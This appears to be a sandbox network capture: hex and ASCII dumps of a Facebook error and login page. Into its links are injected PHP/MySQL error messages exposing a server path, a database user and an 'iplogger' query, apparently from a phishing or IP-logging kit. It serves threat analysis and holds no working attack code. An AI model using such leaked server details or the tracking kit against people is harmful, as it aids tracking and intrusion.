","app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallback_for_br":true,"fix_br_init_rc":false,"queue_activation_experiment":false,"max_delay_br_queue":60
2022-10-07 13:59:25 UTC	619	IN	Data Raw: 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 22 41 61 31 6a 6e 38 6a 44 34 71 6e 72 71 33 38 50 7a 2d 50 67 4c 42 4f 48 4b 37 46 4b 39 53 5a 71 76 6e 64 59 64 2d 66 2d 66 66 6b 2d 4c 6c 43 66 4b 78 69 69 5f 77 55 37 2d 62 4a 46 36 38 41 45 34 38 6f 35 74 52 72 4f 76 5a 51 34 77 50 78 69 63 6c 55 4d 78 55 6d 53 4f 79 59 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 33 35 37 39 22 2c 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 49 6e 6c 69 6e 65 46 62 74 52 65 73 75 6c 74 49 6d 70 6c 22 2c 22 41 61 31 6a 6e 38 6a 44 34 71 6e 72 71 33 38 50 7a 2d 50 67 4c 42 4f 48 4b 37 46 4b 39 53 5a 71 76 6e 64 59 64 2d 66 2d 66 66 6b 2d 4c 6c 43 66 4b 78 69 69 5f 77 55 37 2d 62 4a 46 36 38 41 45 34 Data Ascii: "clearIntervalBlue","Aa1jn8jD4qnrq38Pz-PgLBOHK7FK9SZqvndYd-f-ffk-LlCfKxii_wU7-bJF68AE48o5tRrOvZQ4wPxiclUMxUmSOyY"]},-1],["cr:1183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa1jn8jD4qnrq38Pz-PgLBOHK7FK9SZqvndYd-f-ffk-LlCfKxii_wU7-bJF68AE4
2022-10-07 13:59:25 UTC	620	IN	Data Raw: 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 7d 2c 32 33 39 33 5d 2c 5b 22 49 6e 74 6c 43 75 72 72 65 6e 74 4c 6f 63 61 6c 65 22 2c 5b 5d 2c 7b 22 63 6f 64 65 22 3a 22 65 6e 5f 55 53 22 7d 2c 35 39 35 34 5d 2c 5b 22 55 53 49 44 4d 65 74 61 64 61 74 61 22 2c 5b 5d 2c 7b 22 62 72 6f 77 73 65 72 5f 69 64 22 3a 22 3f 22 2c 22 74 61 62 5f 69 64 22 3a 22 22 2c 22 70 61 67 65 5f 69 64 22 3a 22 50 72 6a 64 79 76 31 31 61 66 33 35 7a 31 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 5f 69 64 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 7d 2c 35 38 38 38 5d 2c 5b 22 63 72 3a 36 38 36 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 30 74 37 78 61 72 35 70 5a 61 75 4e 50 72 38 46 39 6e 65 64 33 6c 4a 58 2d 33 4d 4c 69 66 6e 33 32 65 46 75 4f 42 38 62 4e 62 58 58 78 35 Data Ascii: onfig",[],{},2393],["IntlCurrentLocale",[],{"code":"en_US"},5954],["USIDMetadata",[],{"browser_id":"?","tab_id":"","page_id":"Prjdyv11af35z1","transition_id":0,"version":6},5888],["cr:686",[],{"__rc":[null,"Aa0t7xar5pZauNPr8F9ned3lJX-3MLifn32eFuOB8bNbXXx5
2022-10-07 13:59:25 UTC	622	IN	Data Raw: 69 74 6c 65 3d 22 47 6f 20 74 6f 20 46 61 63 65 62 6f 6f 6b 20 68 6f 6d 65 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 62 5f 6c 6f 67 6f 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 39 31 36 37 64 36 22 3e 3c 75 3e 46 61 63 65 62 6f 6f 6b 3c 2f 75 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 34 20 72 66 6c 6f 61 74 20 5f 6f 68 66 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 66 6f 72 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 64 3d 22 75 5f 30 5f 30 5f 49 52 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 22 3e 4a 6f 69 6e 20 6f 72 20 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 20 e2 80 89 20 3c 69 Data Ascii: itle="Go to Facebook home"><i class="fb_logo img sp_ot1t5YjYL3s sx_9167d6"><u>Facebook</u></i></a></h1></div><div class="_yl4 rfloat _ohf" data-testid="royal_login_form"><a href="/" id="u_0_0_IR"><span style="color: white">Join or Log Into Facebook <i
2022-10-07 13:59:25 UTC	623	IN	Data Raw: 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 74 69 6d 65 7a 6f 6e 65 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 33 5f 34 6b 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 67 6e 64 69 6d 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 34 5f 42 36 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 67 6e 72 6e 64 22 20 76 61 6c 75 65 3d 22 30 36 35 39 32 35 5f 62 5f 7a 47 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 Data Ascii: ="off" name="timezone" value="" id="u_0_3_4k" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_B6" /><input type="hidden" name="lgnrnd" value="065925_b_zG" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="h
2022-10-07 13:59:25 UTC	625	IN	Data Raw: 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 76 6c 20 5f 34 2d 64 6f 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 5f 34 2d 64 70 22 3e 54 68 69 73 20 70 61 67 65 20 69 73 6e 26 23 30 33 39 3b 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 3c 68 33 20 63 6c 61 73 73 3d 22 5f 34 2d 64 71 22 3e 54 68 65 20 6c 69 6e 6b 20 79 6f 75 20 66 6f 6c 6c 6f 77 65 64 20 6d 61 79 20 62 65 20 62 72 6f 6b 65 6e 2c 20 6f 72 20 74 68 65 20 70 61 67 65 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 3c 2f 68 33 3e 3c 69 20 63 6c 61 73 73 3d 22 6d 76 6c 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 37 37 38 38 63 30 22 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 62 6c 20 70 76 6c 20 5f 34 2d 64 72 20 66 73 Data Ascii: e="main"><div class="pvl _4-do"><h2 class="_4-dp">This page isn't available</h2><h3 class="_4-dq">The link you followed may be broken, or the page may have been removed.</h3><i class="mvl img sp_ot1t5YjYL3s sx_7788c0"></i><div class="mbl pvl _4-dr fs
2022-10-07 13:59:25 UTC	626	IN	Data Raw: 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 Data Ascii: %3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhos
2022-10-07 13:59:25 UTC	628	IN	Data Raw: 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 Data Ascii: emoved\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u
2022-10-07 13:59:25 UTC	629	IN	Data Raw: 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c Data Ascii: 2520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\
2022-10-07 13:59:25 UTC	630	IN	Data Raw: 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a Data Ascii: .136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:
2022-10-07 13:59:25 UTC	632	IN	Data Raw: 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 Data Ascii: ssword:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00
2022-10-07 13:59:25 UTC	633	IN	Data Raw: 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 46 72 65 6e 63 68 20 28 46 72 61 6e 63 65 29 22 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 Data Ascii: ot;www_list_selector", 1); return false;" title="French (France)">Franais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20i
2022-10-07 13:59:25 UTC	635	IN	Data Raw: 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 69 74 5f 49 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a Data Ascii: font%3E" onclick="require("IntlUtils").setCookieLocale("it_IT", "en_US", "https:\/\/it-it.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():
2022-10-07 13:59:25 UTC	636	IN	Data Raw: 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 30 30 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 Data Ascii: tabase.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523000000\u002522\u00253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Acce
2022-10-07 13:59:25 UTC	638	IN	Data Raw: 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 Data Ascii: user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20
2022-10-07 13:59:25 UTC	639	IN	Data Raw: 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 Data Ascii: 53C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u
2022-10-07 13:59:25 UTC	641	IN	Data Raw: 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 66 66 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 35 42 54 45 50 5c 75 30 30 32 35 32 30 53 54 4f 50 5c 75 30 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 Data Ascii: 520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523ff0000\u002522\u00253E\u00255BTEP\u002520STOP\u00255D\u00253C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250
2022-10-07 13:59:25 UTC	642	IN	Data Raw: 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c Data Ascii: 0user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall
2022-10-07 13:59:25 UTC	644	IN	Data Raw: 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 Data Ascii: 00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resour
2022-10-07 13:59:25 UTC	645	IN	Data Raw: 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 Data Ascii: E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3C
2022-10-07 13:59:25 UTC	647	IN	Data Raw: 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c Data Ascii: 